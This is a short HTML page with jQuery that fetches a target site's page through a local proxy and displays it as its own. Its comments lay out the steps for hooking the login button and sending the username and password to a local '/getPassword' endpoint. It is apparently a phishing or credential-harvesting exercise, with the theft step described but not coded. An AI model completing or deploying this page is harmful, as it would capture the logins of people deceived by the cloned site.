<html>

<head>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
    <script>
        let newHtml;
        
        $(document).ready(function () {
            $.ajax({
                url: 'http://127.0.0.1:5000/proxy',
                success: function (data) {
                    newHtml = data;
                    display_html();
                }
            });
        });

        function display_html() {
            $("body").append(newHtml);

            //  Go to the login page of the target url and inspect the page to find the class of the signup/login button and id of the username/email and password fields
            // Use $ selector to select login button using its class and then call click method and pass an anonymous function to it.
            
            
                // Create and ajax request to http://127.0.0.1:5000/getPassword url and add data key with { id: "userLoginId", password: "userPassword" }
               
        }

    </script>
</head>
<body>
</body>
</html>
